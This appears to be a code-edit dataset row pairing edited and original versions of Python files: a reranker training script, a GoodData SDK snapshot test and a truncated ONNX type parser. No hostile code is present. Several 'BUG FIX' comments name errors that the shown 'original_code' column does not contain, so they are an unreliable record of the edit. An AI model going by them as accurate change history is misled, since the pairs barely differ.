edited_code stringlengths 17 978k | original_code stringlengths 17 978k |
|---|---|
import argparse
import logging
import os
import sys
import socket
import json
import pickle
import torch
from datetime import datetime
from transformers import AutoConfig, AutoTokenizer, AutoModel
from torch.utils.data import DataLoader, RandomSampler
from .framework import RerankerFramework
from ..datasets import (EfficientQARerankerDatasetForBaselineReranker_TRAIN,
EfficientQARerankerDatasetForBaselineReranker,
BaselineRerankerQueryBuilder)
from ..models import BaselineReranker
from ...common.utility.utility import setup_logging
LOGGER = logging.getLogger(__name__)
def build_parser():
    """Build the command-line argument parser for the reranker training script."""
    parser = argparse.ArgumentParser(description='Passages Reranker training process.')
    parser.add_argument("--config", default=None, help="")
    parser.add_argument("--train", default="./data/train_wiki.jsonl", help="train dataset")
    parser.add_argument("--val", default="./data/val_wiki.jsonl", help="validation dataset")
    parser.add_argument("--database", default="./data/wiki.db", help="database with full passages")
    parser.add_argument("--hard_negatives", default=None, help="")
    parser.add_argument("--encoder", default="roberta-base", help="name or path to encoder")
    parser.add_argument("--cache_dir", default=None, help="cache directory")
    parser.add_argument("--max_length", default=512, type=int, help="maximum length of the input sequence")
    parser.add_argument("--checkpoint_dir", default=".checkpoints", help="directory to saving checkpoints")
    parser.add_argument("--no_gpu", action="store_true", help="no use GPU")
    parser.add_argument("--train_batch_size", default=20, type=int, help="mini-batch size")
    parser.add_argument("--eval_batch_size", default=100, type=int, help="mini-batch size")
    parser.add_argument("--iter_size", default=8, type=int, help="accumulated gradient")
    parser.add_argument("--num_epoch", default=5, type=int, help="number of epochs")
    # NOTE(review): type=int for a learning rate (default 1) looks suspicious;
    # confirm whether type=float was intended.
    parser.add_argument("--lr", default=1, type=int, help="learning rate")
    parser.add_argument("--fp16", action="store_true", help="train with fp16")
    parser.add_argument("--criterion", default=None, help="loss function (CE/BCE)")
    return parser
def binary_cross_entropy():
    """Build a summed BCE loss for reranker logits.

    Returns:
        Callable ``inner(logits, target)`` where ``logits`` has shape
        (1, num_passages) and ``target`` holds the index of the positive
        passage; the target is converted to a one-hot vector.
    """
    criterion = torch.nn.BCEWithLogitsLoss(reduction="sum")

    def inner(logits, target):
        logits = logits.squeeze(0)
        batch_size = logits.shape[0]
        # BUG FIX: target.get_device() returns -1 for CPU tensors, which is not
        # a valid device argument; target.device works for CPU and CUDA alike.
        one_hots = torch.zeros(batch_size, device=target.device)
        one_hots[target] = 1.
        return criterion(logits, one_hots)

    return inner
def get_dataloader_for_baseline_reranker(dataset, random_sampler=False):
    """Wrap *dataset* in a DataLoader that unwraps the singleton batch.

    The reranker datasets already yield fully-formed batches, so the loader
    keeps its default batch_size of 1 and the collate function simply returns
    the single contained item.
    """
    kwargs = {"collate_fn": lambda batch: batch[0]}
    if random_sampler:
        kwargs["sampler"] = RandomSampler(dataset)
    return DataLoader(dataset, **kwargs)
def train(args):
    """Train the baseline passage reranker end to end.

    Args:
        args: dict of training options (see ``build_parser`` for keys).
    """
    LOGGER.info("Config: " + json.dumps(args, sort_keys=True, indent=2))
    config = AutoConfig.from_pretrained(args["encoder"], cache_dir=args["cache_dir"])
    tokenizer = AutoTokenizer.from_pretrained(args["encoder"], cache_dir=args["cache_dir"], use_fast=False)
    LOGGER.info("Load datasets.")
    if args["hard_negatives"]:
        # NOTE(review): pickle.load is unsafe on untrusted files; the negatives
        # file is assumed to be produced by this project.
        with open(args["hard_negatives"], "rb") as file_:
            negatives = pickle.load(file_)
    else:
        negatives = None
    model_config = {
        "reranker_model_type": "baseline",
        "encoder": args["encoder"],
        "encoder_config": config,
        "max_length": args["max_length"],
        # BUG FIX: use identity comparison for None, not `!=`.
        "negatives": negatives is not None
    }
    query_builder = BaselineRerankerQueryBuilder(tokenizer, args["max_length"])
    train_dataset = EfficientQARerankerDatasetForBaselineReranker_TRAIN(
        args["train"], args["database"], tokenizer, query_builder,
        args["train_batch_size"], negative_samples=negatives,
        shuffle_predicted_indices=True)
    val_dataset = EfficientQARerankerDatasetForBaselineReranker(
        args["val"], args["database"], query_builder, args["eval_batch_size"])
    train_dataloader = get_dataloader_for_baseline_reranker(train_dataset, random_sampler=True)
    val_dataloader = get_dataloader_for_baseline_reranker(val_dataset, random_sampler=False)
    LOGGER.info("Reranker training configuration: " + json.dumps(args, indent=4, sort_keys=True))
    LOGGER.info("Model inicialization.")
    LOGGER.info(f"Cuda is available: {torch.cuda.is_available()}")
    device = torch.device("cuda:0" if torch.cuda.is_available() and not args["no_gpu"] else "cpu")
    framework = RerankerFramework(device, model_config, train_dataloader, val_dataloader)
    encoder = AutoModel.from_pretrained(args["encoder"], cache_dir=args["cache_dir"])
    model = BaselineReranker(config, encoder)
    model = model.to(device)
    checkpoint_name = "reranker_"
    checkpoint_name += args["encoder"].split('/')[-1]
    checkpoint_name += "_" + datetime.today().strftime('%Y-%m-%d-%H-%M')
    checkpoint_name += "_" + socket.gethostname()
    if args["criterion"] == "CE":
        LOGGER.info("Cross entropy is used.")
        criterion = torch.nn.CrossEntropyLoss()
    elif args["criterion"] == "BCE":
        LOGGER.info("Binary cross entropy is used.")
        checkpoint_name += "_" + "BCE-loss"
        criterion = binary_cross_entropy()
    else:
        # BUG FIX: LOGGER.warn is deprecated (use warning); the original
        # f-string also nested single quotes inside a single-quoted literal,
        # a SyntaxError before Python 3.12.
        LOGGER.warning(f"Unknown '{args['criterion']}' loss function. Default loss function is used.")
        criterion = None
    # Build the checkpoint path only after the name is final.
    # BUG FIX: previously the "_BCE-loss" suffix was appended AFTER save_ckpt
    # had been computed, so it never reached the saved file name.
    save_ckpt = None
    if args["checkpoint_dir"]:
        # exist_ok avoids the race between an isdir() check and mkdir().
        os.makedirs(args["checkpoint_dir"], exist_ok=True)
        save_ckpt = os.path.join(args["checkpoint_dir"], checkpoint_name)
    LOGGER.info("Training started.")
    framework.train(model,
                    learning_rate=args["lr"],
                    batch_size=args["train_batch_size"],
                    iter_size=args["iter_size"],
                    num_epoch=args["num_epoch"],
                    save_ckpt=save_ckpt,
                    fp16=args["fp16"],
                    criterion=criterion)
    LOGGER.info("Training completed.")
if __name__ == "__main__":
    setup_logging(os.path.basename(sys.argv[0]).split(".")[0],
                  logpath=".logs/",
                  config_path="configurations/logging.yml")
    parser = build_parser()
    args = parser.parse_args()
    if args.config:
        if not os.path.exists(args.config):
            # BUG FIX: error message grammar ("does not found" -> "was not found").
            LOGGER.error("Config file was not found.")
            sys.exit(1)
        # Values from the JSON config file override the CLI defaults.
        with open(args.config) as file_:
            jsons = json.load(file_)
        args.__dict__.update(jsons)
    # BUG FIX: was `train(var(args))` — `var` is a NameError; `vars(args)`
    # converts the argparse Namespace into the dict that train() expects.
    train(vars(args))
| import argparse
import logging
import os
import sys
import socket
import json
import pickle
import torch
from datetime import datetime
from transformers import AutoConfig, AutoTokenizer, AutoModel
from torch.utils.data import DataLoader, RandomSampler
from .framework import RerankerFramework
from ..datasets import (EfficientQARerankerDatasetForBaselineReranker_TRAIN,
EfficientQARerankerDatasetForBaselineReranker,
BaselineRerankerQueryBuilder)
from ..models import BaselineReranker
from ...common.utility.utility import setup_logging
LOGGER = logging.getLogger(__name__)
def build_parser():
    """Build the command-line argument parser for the reranker training script."""
    parser = argparse.ArgumentParser(description='Passages Reranker training process.')
    parser.add_argument("--config", default=None, help="")
    parser.add_argument("--train", default="./data/train_wiki.jsonl", help="train dataset")
    parser.add_argument("--val", default="./data/val_wiki.jsonl", help="validation dataset")
    parser.add_argument("--database", default="./data/wiki.db", help="database with full passages")
    parser.add_argument("--hard_negatives", default=None, help="")
    parser.add_argument("--encoder", default="roberta-base", help="name or path to encoder")
    parser.add_argument("--cache_dir", default=None, help="cache directory")
    parser.add_argument("--max_length", default=512, type=int, help="maximum length of the input sequence")
    parser.add_argument("--checkpoint_dir", default=".checkpoints", help="directory to saving checkpoints")
    parser.add_argument("--no_gpu", action="store_true", help="no use GPU")
    parser.add_argument("--train_batch_size", default=20, type=int, help="mini-batch size")
    parser.add_argument("--eval_batch_size", default=100, type=int, help="mini-batch size")
    parser.add_argument("--iter_size", default=8, type=int, help="accumulated gradient")
    parser.add_argument("--num_epoch", default=5, type=int, help="number of epochs")
    # NOTE(review): type=int for a learning rate (default 1) looks suspicious;
    # confirm whether type=float was intended.
    parser.add_argument("--lr", default=1, type=int, help="learning rate")
    parser.add_argument("--fp16", action="store_true", help="train with fp16")
    parser.add_argument("--criterion", default=None, help="loss function (CE/BCE)")
    return parser
def binary_cross_entropy():
    """Build a summed BCE loss for reranker logits.

    Returns:
        Callable ``inner(logits, target)`` where ``logits`` has shape
        (1, num_passages) and ``target`` holds the index of the positive
        passage; the target is converted to a one-hot vector.
    """
    criterion = torch.nn.BCEWithLogitsLoss(reduction="sum")

    def inner(logits, target):
        logits = logits.squeeze(0)
        batch_size = logits.shape[0]
        # BUG FIX: target.get_device() returns -1 for CPU tensors, which is not
        # a valid device argument; target.device works for CPU and CUDA alike.
        one_hots = torch.zeros(batch_size, device=target.device)
        one_hots[target] = 1.
        return criterion(logits, one_hots)

    return inner
def get_dataloader_for_baseline_reranker(dataset, random_sampler=False):
    """Wrap *dataset* in a DataLoader that unwraps the singleton batch.

    The reranker datasets already yield fully-formed batches, so the loader
    keeps its default batch_size of 1 and the collate function simply returns
    the single contained item.
    """
    kwargs = {"collate_fn": lambda batch: batch[0]}
    if random_sampler:
        kwargs["sampler"] = RandomSampler(dataset)
    return DataLoader(dataset, **kwargs)
def train(args):
    """Train the baseline passage reranker end to end.

    Args:
        args: dict of training options (see ``build_parser`` for keys).
    """
    LOGGER.info("Config: " + json.dumps(args, sort_keys=True, indent=2))
    config = AutoConfig.from_pretrained(args["encoder"], cache_dir=args["cache_dir"])
    tokenizer = AutoTokenizer.from_pretrained(args["encoder"], cache_dir=args["cache_dir"], use_fast=False)
    LOGGER.info("Load datasets.")
    if args["hard_negatives"]:
        # NOTE(review): pickle.load is unsafe on untrusted files; the negatives
        # file is assumed to be produced by this project.
        with open(args["hard_negatives"], "rb") as file_:
            negatives = pickle.load(file_)
    else:
        negatives = None
    model_config = {
        "reranker_model_type": "baseline",
        "encoder": args["encoder"],
        "encoder_config": config,
        "max_length": args["max_length"],
        # BUG FIX: use identity comparison for None, not `!=`.
        "negatives": negatives is not None
    }
    query_builder = BaselineRerankerQueryBuilder(tokenizer, args["max_length"])
    train_dataset = EfficientQARerankerDatasetForBaselineReranker_TRAIN(
        args["train"], args["database"], tokenizer, query_builder,
        args["train_batch_size"], negative_samples=negatives,
        shuffle_predicted_indices=True)
    val_dataset = EfficientQARerankerDatasetForBaselineReranker(
        args["val"], args["database"], query_builder, args["eval_batch_size"])
    train_dataloader = get_dataloader_for_baseline_reranker(train_dataset, random_sampler=True)
    val_dataloader = get_dataloader_for_baseline_reranker(val_dataset, random_sampler=False)
    LOGGER.info("Reranker training configuration: " + json.dumps(args, indent=4, sort_keys=True))
    LOGGER.info("Model inicialization.")
    LOGGER.info(f"Cuda is available: {torch.cuda.is_available()}")
    device = torch.device("cuda:0" if torch.cuda.is_available() and not args["no_gpu"] else "cpu")
    framework = RerankerFramework(device, model_config, train_dataloader, val_dataloader)
    encoder = AutoModel.from_pretrained(args["encoder"], cache_dir=args["cache_dir"])
    model = BaselineReranker(config, encoder)
    model = model.to(device)
    checkpoint_name = "reranker_"
    checkpoint_name += args["encoder"].split('/')[-1]
    checkpoint_name += "_" + datetime.today().strftime('%Y-%m-%d-%H-%M')
    checkpoint_name += "_" + socket.gethostname()
    if args["criterion"] == "CE":
        LOGGER.info("Cross entropy is used.")
        criterion = torch.nn.CrossEntropyLoss()
    elif args["criterion"] == "BCE":
        LOGGER.info("Binary cross entropy is used.")
        checkpoint_name += "_" + "BCE-loss"
        criterion = binary_cross_entropy()
    else:
        # BUG FIX: LOGGER.warn is deprecated; use LOGGER.warning.
        LOGGER.warning(f"Unknown '{args['criterion']}' loss function. Default loss function is used.")
        criterion = None
    # Build the checkpoint path only after the name is final.
    # BUG FIX: previously the "_BCE-loss" suffix was appended AFTER save_ckpt
    # had been computed, so it never reached the saved file name.
    save_ckpt = None
    if args["checkpoint_dir"]:
        # exist_ok avoids the race between an isdir() check and mkdir().
        os.makedirs(args["checkpoint_dir"], exist_ok=True)
        save_ckpt = os.path.join(args["checkpoint_dir"], checkpoint_name)
    LOGGER.info("Training started.")
    framework.train(model,
                    learning_rate=args["lr"],
                    batch_size=args["train_batch_size"],
                    iter_size=args["iter_size"],
                    num_epoch=args["num_epoch"],
                    save_ckpt=save_ckpt,
                    fp16=args["fp16"],
                    criterion=criterion)
    LOGGER.info("Training completed.")
if __name__ == "__main__":
    setup_logging(os.path.basename(sys.argv[0]).split(".")[0],
                  logpath=".logs/",
                  config_path="configurations/logging.yml")
    parser = build_parser()
    args = parser.parse_args()
    if args.config:
        if not os.path.exists(args.config):
            # BUG FIX: error message grammar ("does not found" -> "was not found").
            LOGGER.error("Config file was not found.")
            sys.exit(1)
        # Values from the JSON config file override the CLI defaults.
        with open(args.config) as file_:
            jsons = json.load(file_)
        args.__dict__.update(jsons)
    # BUG FIX: was `train(var(args))` — `var` is a NameError; `vars(args)`
    # converts the argparse Namespace into the dict that train() expects.
    train(vars(args))
|
# (C) 2021 GoodData Corporation
from __future__ import annotations
import json
import os
import pytest
from gooddata_sdk.compute.model.attribute import Attribute
from gooddata_sdk.compute.model.base import ObjId
from gooddata_sdk.compute.model.execution import compute_model_to_api_model
from gooddata_sdk.compute.model.filter import AbsoluteDateFilter, PositiveAttributeFilter
from gooddata_sdk.compute.model.metric import PopDate, PopDateDataset, PopDateMetric, PopDatesetMetric, SimpleMetric
_current_dir = os.path.dirname(os.path.abspath(__file__))
def _scenario_to_snapshot_name(scenario: str):
    """Convert a human-readable scenario name to its snapshot file name."""
    # BUG FIX: the original nested double quotes inside a double-quoted
    # f-string (replace(" ", "_")), which is a SyntaxError before Python 3.12;
    # use single quotes for the replace() arguments instead.
    return f"{scenario.replace(' ', '_')}.snapshot.json"
# --- shared fixtures for the parametrized scenarios -----------------------
# Minimal metric and attribute reused across scenarios.
_simple_metric = SimpleMetric(local_id="simple_metric_local_id", item=ObjId(type="metric", id="metric_id"))
_attribute = Attribute(local_id="attribute_local_id", label="label.id")
# Period-over-period metric defined against a date dataset.
_pop_dataset_metric = PopDatesetMetric(
    local_id="local_id1",
    metric=_simple_metric,
    date_datasets=[PopDateDataset(dataset=ObjId(type="dataset", id="dataset.id"), periods_ago=1)],
)
# Period-over-period metric defined against a date attribute (label).
_pop_date_metric = PopDateMetric(
    local_id="local_id1",
    metric=_simple_metric,
    date_attributes=[PopDate(attribute=ObjId(type="label", id="label.id"), periods_ago=1)],
)
_positive_filter = PositiveAttributeFilter(label=_attribute, values=["val1", "val2"])
_absolute_date_filter = AbsoluteDateFilter(
    dataset=ObjId(type="dataset", id="dataset.id"),
    from_date="2021-07-01 18:23",
    to_date="2021-07-16 18:23",
)
# Each entry is [scenario name, attributes, metrics, filters]; None means the
# dimension is absent in that scenario.
test_inputs = [
    [
        "multiple attributes and metrics and filters",
        [_attribute, Attribute(local_id="attribute_local_id2", label="label2.id")],
        [_simple_metric, _pop_date_metric, _pop_dataset_metric],
        [_positive_filter, _absolute_date_filter],
    ],
    ["attribute only", [_attribute], None, None],
    ["attribute and filter ", [_attribute], None, [_positive_filter]],
    ["metric only ", None, [_simple_metric], None],
    ["metric and filter ", None, [_simple_metric], [_positive_filter]],
    [
        "attribute and metric and filter ",
        [_attribute],
        [_simple_metric],
        [_positive_filter],
    ],
]
@pytest.mark.parametrize("scenario,attributes,metrics,filters", test_inputs)
def test_attribute_filters_to_api_model(scenario, attributes, metrics, filters, snapshot):
    """Snapshot-test conversion of the compute model into the AFM API model."""
    # it is essential to define snapshot dir using absolute path, otherwise snapshots cannot be found when
    # running in tox
    snapshot.snapshot_dir = os.path.join(_current_dir, "afm")
    afm = compute_model_to_api_model(attributes, metrics, filters)
    snapshot.assert_match(
        json.dumps(afm.to_dict(), indent=4, sort_keys=True),
        _scenario_to_snapshot_name(scenario),
    )
| # (C) 2021 GoodData Corporation
from __future__ import annotations
import json
import os
import pytest
from gooddata_sdk.compute.model.attribute import Attribute
from gooddata_sdk.compute.model.base import ObjId
from gooddata_sdk.compute.model.execution import compute_model_to_api_model
from gooddata_sdk.compute.model.filter import AbsoluteDateFilter, PositiveAttributeFilter
from gooddata_sdk.compute.model.metric import PopDate, PopDateDataset, PopDateMetric, PopDatesetMetric, SimpleMetric
_current_dir = os.path.dirname(os.path.abspath(__file__))
def _scenario_to_snapshot_name(scenario: str):
return f"{scenario.replace(' ', '_')}.snapshot.json"
_simple_metric = SimpleMetric(local_id="simple_metric_local_id", item=ObjId(type="metric", id="metric_id"))
_attribute = Attribute(local_id="attribute_local_id", label="label.id")
_pop_dataset_metric = PopDatesetMetric(
local_id="local_id1",
metric=_simple_metric,
date_datasets=[PopDateDataset(dataset=ObjId(type="dataset", id="dataset.id"), periods_ago=1)],
)
_pop_date_metric = PopDateMetric(
local_id="local_id1",
metric=_simple_metric,
date_attributes=[PopDate(attribute=ObjId(type="label", id="label.id"), periods_ago=1)],
)
_positive_filter = PositiveAttributeFilter(label=_attribute, values=["val1", "val2"])
_absolute_date_filter = AbsoluteDateFilter(
dataset=ObjId(type="dataset", id="dataset.id"),
from_date="2021-07-01 18:23",
to_date="2021-07-16 18:23",
)
test_inputs = [
[
"multiple attributes and metrics and filters",
[_attribute, Attribute(local_id="attribute_local_id2", label="label2.id")],
[_simple_metric, _pop_date_metric, _pop_dataset_metric],
[_positive_filter, _absolute_date_filter],
],
["attribute only", [_attribute], None, None],
["attribute and filter ", [_attribute], None, [_positive_filter]],
["metric only ", None, [_simple_metric], None],
["metric and filter ", None, [_simple_metric], [_positive_filter]],
[
"attribute and metric and filter ",
[_attribute],
[_simple_metric],
[_positive_filter],
],
]
@pytest.mark.parametrize("scenario,attributes,metrics,filters", test_inputs)
def test_attribute_filters_to_api_model(scenario, attributes, metrics, filters, snapshot):
# it is essential to define snapshot dir using absolute path, otherwise snapshots cannot be found when
# running in tox
snapshot.snapshot_dir = os.path.join(_current_dir, "afm")
afm = compute_model_to_api_model(attributes, metrics, filters)
snapshot.assert_match(
json.dumps(afm.to_dict(), indent=4, sort_keys=True),
_scenario_to_snapshot_name(scenario),
)
|
import re
import itertools
def format_text(prefix, start, texts):
    """Word-wrap *texts* to ~79 columns, prefixing every line with *prefix*.

    If *start* is non-empty it is emitted once at the beginning and continuation
    lines are indented by its width (hanging-indent style). Blank lines inside a
    text (from "\n\n") are collapsed to at most one paragraph break.
    """
    output = []
    curr = []
    if start:
        curr.append(start)
    # Counts consecutive empty "words"; used to collapse repeated blank lines.
    linebreaks = 0
    for text in texts:
        lines = []
        length = len(prefix)
        if start:
            # NOTE(review): the doubled `+ +` is redundant but harmless.
            length += + len(start)
        # split text into words by splitting on space and remove empty splits ("")
        # then split on newline boundaries, but keep empty splits ("\n\n")
        words = [w.split("\n") for w in text.strip().split(" ") if w != ""]
        words = list(itertools.chain(*words))
        for w in words:
            if w.strip() == "":
                if linebreaks == 0:
                    linebreaks += 1
                    continue
                if linebreaks >= 2:
                    # we already did 2 line breaks, skip this one
                    continue
                # empty split, caused by "\n\n", should cause single line break
                linebreaks += 1
                length = len(prefix)
                lines.append(prefix + " ".join(curr))
                curr = []
                if start:
                    length += len(start)
                    curr.append(" "*len(start))
                continue
            else:
                linebreaks = 0
            if length + len(w) < 79:
                # keep adding words
                length += len(w) + 1
                curr.append(w)
                continue
            # line is full, do line break
            length = len(prefix) + len(w)
            lines.append(prefix + " ".join(curr))
            curr = []
            if start:
                length += len(start)
                curr.append(" "*len(start))
            curr.append(w)
        # Flush whatever is left of the current text before the next one.
        lines.append(prefix + " ".join(curr))
        curr = []
        if start:
            curr.append(" "*len(start))
        output.append("\n".join(lines))
    return "\n".join(output)
class OnnxType(dict):
    """Parse tree of an ONNX type string such as "tensor(float)".

    The instance IS the dict-shaped parse tree, e.g.
    ``OnnxType("seq(tensor(int32))") == {"seq": {"tensor": "int32"}}``.
    The original string is kept in ``self.original`` and used for hashing.
    """

    # Elementary ONNX type name -> generated C enum constant name.
    _onnxTensorDataType = {
        "float": "ONNX__TENSOR_PROTO__DATA_TYPE__FLOAT",
        "uint8": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT8",
        "int8": "ONNX__TENSOR_PROTO__DATA_TYPE__INT8",
        "uint16": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT16",
        "int16": "ONNX__TENSOR_PROTO__DATA_TYPE__INT16",
        "int32": "ONNX__TENSOR_PROTO__DATA_TYPE__INT32",
        "int64": "ONNX__TENSOR_PROTO__DATA_TYPE__INT64",
        "string": "ONNX__TENSOR_PROTO__DATA_TYPE__STRING",
        "bool": "ONNX__TENSOR_PROTO__DATA_TYPE__BOOL",
        "float16": "ONNX__TENSOR_PROTO__DATA_TYPE__FLOAT16",
        "double": "ONNX__TENSOR_PROTO__DATA_TYPE__DOUBLE",
        "uint32": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT32",
        "uint64": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT64",
        "complex64": "ONNX__TENSOR_PROTO__DATA_TYPE__COMPLEX64",
        "complex128": "ONNX__TENSOR_PROTO__DATA_TYPE__COMPLEX128",
        "bfloat16": "ONNX__TENSOR_PROTO__DATA_TYPE__BFLOAT16",
    }

    class _Scanner:
        """Longest-match tokenizer for ONNX type strings."""

        # Pattern -> token name; None means whitespace, which is dropped.
        _tokens = {
            re.compile(r"tensor") : "tensor" ,
            re.compile(r"map") : "map" ,
            re.compile(r"seq") : "seq" ,
            re.compile(r"\(") : "(" ,
            re.compile(r"\)") : ")" ,
            re.compile(r"float") : "float" ,
            re.compile(r"uint8") : "uint8" ,
            re.compile(r"int8") : "int8" ,
            re.compile(r"uint16") : "uint16" ,
            re.compile(r"int16") : "int16" ,
            re.compile(r"int32") : "int32" ,
            re.compile(r"int64") : "int64" ,
            re.compile(r"string") : "string" ,
            re.compile(r"bool") : "bool" ,
            re.compile(r"float16") : "float16" ,
            re.compile(r"double") : "double" ,
            re.compile(r"uint32") : "uint32" ,
            re.compile(r"uint64") : "uint64" ,
            re.compile(r"complex64") : "complex64" ,
            re.compile(r"complex128") : "complex128",
            re.compile(r"bfloat16") : "bfloat16" ,
            re.compile(r",") : "," ,
            re.compile(r"\s+") : None ,
        }

        def __init__(self, string):
            self.string = string
            self.tokens = self.tokenize(string)

        def tokenize(self, string):
            """Split *string* into tokens; raise SyntaxError on unknown input."""
            pos = 0
            tokens = []
            while string[pos:]:
                allMatches = map(lambda x: (x[0].match(string[pos:]), x[1]), self._tokens.items())
                validMatches = filter(lambda x: x[0], allMatches)
                try:
                    # Longest match wins (e.g. "float16" beats "float").
                    longestMatch = max(validMatches, key=lambda x: x[0].end())
                except ValueError:
                    # BUG FIX: was a bare `except:`, which also swallows
                    # SystemExit/KeyboardInterrupt; max() raises ValueError
                    # when no token pattern matches.
                    raise SyntaxError(f"no token matches: '{string[pos:]}'")
                else:
                    pos += longestMatch[0].end()
                    if longestMatch[1]:
                        tokens.append(longestMatch[1])
            return tokens

        def consume(self, expected_token=None):
            """Pop the next token, optionally requiring it to equal *expected_token*."""
            if not expected_token:
                return self.pop()
            if not self.peek(expected_token):
                raise SyntaxError(
                    f"expected '{expected_token}', but got '{self.peek()}'")
            return self.pop()

        def peek(self, expected_token=None):
            """Return the next token, or compare it against *expected_token*."""
            token = self.tokens[0]
            if expected_token:
                return token == expected_token
            else:
                return token

        def pop(self):
            return self.tokens.pop(0)

        def onToken(self, token2function, consume=False):
            """Dispatch on the next token through *token2function*."""
            for token, function in token2function.items():
                if self.peek(token):
                    if consume:
                        self.pop()
                    return function()
            tokens = ", ".join([f"'{t}'" for t in token2function.keys()])
            raise SyntaxError(f"expected one of {tokens}, but got '{self.peek()}'")

        def __repr__(self):
            return f"OnnxType._Scanner({self.string.__repr__()})"

    class _Parser:
        """Recursive-descent parser over a _Scanner token stream."""

        # Terminal tokens simply evaluate to themselves.
        _terminals = {
            "float": lambda: "float",
            "uint8": lambda: "uint8",
            "int8": lambda: "int8",
            "uint16": lambda: "uint16",
            "int16": lambda: "int16",
            "int32": lambda: "int32",
            "int64": lambda: "int64",
            "string": lambda: "string",
            "bool": lambda: "bool",
            "float16": lambda: "float16",
            "double": lambda: "double",
            "uint32": lambda: "uint32",
            "uint64": lambda: "uint64",
            "complex64": lambda: "complex64",
            "complex128": lambda: "complex128",
            "bfloat16": lambda: "bfloat16",
        }

        def __init__(self, scanner):
            self.scanner = scanner

        def __repr__(self):
            return f"OnnxType._Parser({self.scanner.__repr__()})"

        def _rule_tensor(self):
            # tensor '(' <terminal> ')'
            self.scanner.consume('(')
            result = self.scanner.onToken(self._terminals, consume=True)
            self.scanner.consume(')')
            return {"tensor": result}

        def _rule_map(self):
            # map '(' <terminal> ',' (<rule> | <terminal>) ')'
            rules = {
                "tensor": self._rule_tensor,
                "map": self._rule_map,
                "seq": self._rule_seq,
            }
            rules.update(self._terminals)
            self.scanner.consume('(')
            key = self.scanner.onToken(self._terminals, consume=True)
            self.scanner.consume(',')
            value = self.scanner.onToken(rules, consume=True)
            self.scanner.consume(')')
            return {"map": (key, value)}

        def _rule_seq(self):
            # seq '(' (<rule> | <terminal>) ')'
            rules = {
                "tensor": self._rule_tensor,
                "map": self._rule_map,
                "seq": self._rule_seq
            }
            rules.update(self._terminals)
            self.scanner.consume('(')
            result = self.scanner.onToken(rules, consume=True)
            self.scanner.consume(')')
            return {"seq": result}

        def parse(self):
            """Parse one complete type expression."""
            rules = {
                "tensor": self._rule_tensor,
                "map": self._rule_map,
                "seq": self._rule_seq,
            }
            return self.scanner.onToken(rules, consume=True)

    def __init__(self, typeStr):
        # BUG FIX: a bare `super()` expression is a no-op; call __init__.
        super().__init__()
        self.original = typeStr
        scanner = self._Scanner(typeStr)
        parser = self._Parser(scanner)
        self.update(parser.parse())

    def __str__(self):
        return self._text_walkParseTree(self)

    def __repr__(self):
        return f"OnnxType({self.original.__repr__()})"

    def _text_walkParseTree(self, node):
        """Flatten the parse tree into an identifier such as "tensor_float"."""
        if isinstance(node, str):
            return node.replace("_", "")
        elif isinstance(node, dict):
            subresults = []
            for key, val in node.items():
                subresults.append(key + "_" + self._text_walkParseTree(val))
            return "__".join(subresults)
        elif isinstance(node, tuple):
            return "__".join([self._text_walkParseTree(t) for t in node])
        else:
            # NOTE(review): BaseException is overly broad; kept for backward
            # compatibility with any existing callers catching it.
            raise BaseException(f"unknown parseTree item: '{node}'")

    def onnxTensorDataTypes(self):
        """Return the C enum names of every tensor element type in the tree."""
        results = []
        self._onnxTensorDataType_walkParseTree(self, results)
        return list(filter(None, results))

    def _onnxTensorDataType_walkParseTree(self, node, results):
        if isinstance(node, str):
            # Bare terminals (e.g. map keys) contribute no tensor data type.
            results.append(None)
        elif isinstance(node, dict):
            for key, val in node.items():
                if key == "tensor":
                    results.append(self._onnxTensorDataType[val])
                else:
                    self._onnxTensorDataType_walkParseTree(val, results)
        elif isinstance(node, tuple):
            for val in node:
                self._onnxTensorDataType_walkParseTree(val, results)
        else:
            raise BaseException(f"unknown parseTree item: '{node}'")

    def __hash__(self):
        # Hash by the original string so instances can live in sets/dict keys
        # even though dict itself is unhashable.
        return self.original.__hash__()
class OnnxTypeList(list):
    """A sorted list of OnnxType objects built from ONNX type strings."""

    def __init__(self, typeList):
        # BUG FIX: a bare `super()` expression is a no-op; call __init__.
        super().__init__()
        # sorted() replaces the manual copy-extend-sort of the original.
        self.extend(OnnxType(t) for t in sorted(typeList))

    def __str__(self):
        return ", ".join([f"{t}" for t in self])

    def __repr__(self):
        types = ", ".join([t.original.__repr__() for t in self])
        return f"OnnxTypeList([{types}])"
class OnnxConstraint():
    """One type constraint of an ONNX operator schema.

    Accepts either an already-serialized dict or an onnx OpSchema type
    constraint object; ``input``/``output`` record whether the constraint is
    referenced by any schema input/output.
    """

    def __init__(self, constraint, input=False, output=False):
        if isinstance(constraint, dict):
            self.types = constraint['types']
            self.description = constraint['description']
            self.name = constraint['name']
            self.input = constraint['input']
            self.output = constraint['output']
        else:
            self.types = OnnxTypeList(constraint.allowed_type_strs)
            self.description = constraint.description
            self.name = constraint.type_param_str
            self.input = input
            self.output = output

    def text(self, prefix=""):
        """Render the constraint as indented human-readable text."""
        lines = []
        lines.append(f"{prefix}Constraint {self.name}:")
        lines.append(format_text(prefix + " ", "", [self.description]))
        lines.append(format_text(prefix + " ", "Allowed Types:", [str(self.types)]))
        return "\n".join(lines)

    def __repr__(self):
        return f"OnnxConstraint({self.__dict__.__repr__()})"
class OnnxConstraints(dict):
    """Maps constraint name -> OnnxConstraint for one operator schema."""

    def __init__(self, schema):
        # NOTE(review): bare `super()` is a no-op expression; dict subclasses
        # happen to work regardless, but `super().__init__()` was intended.
        super()
        constraints = {c.type_param_str for c in schema.type_constraints}
        inputs = {i.typeStr for i in schema.inputs if i.typeStr in constraints}
        outputs = {o.typeStr for o in schema.outputs if o.typeStr in constraints}
        for constraint in schema.type_constraints:
            self[constraint.type_param_str] = OnnxConstraint(constraint, input=constraint.type_param_str in inputs, output=constraint.type_param_str in outputs)

    def typePermutations(self, filterInput=False, filterOutput=False):
        """Render every constraint/type permutation as an identifier string."""
        return list(filter(None,(self.typePermutationText(p) for p in self.typePermutationsTuple(filterInput,filterOutput))))

    def typePermutationText(self, permutation):
        """Join one permutation of (constraint-name, type) pairs into a string."""
        return "__".join([ f"{x[0]}_{x[1]}" for x in permutation ])

    def typePermutationsTuple(self, filterInput=False, filterOutput=False):
        # `bool(a) ** bool(b)` is false only when a is falsy and b is truthy,
        # i.e. it computes "b implies a": keep a constraint only when
        # (filterInput -> it is used by an input) and
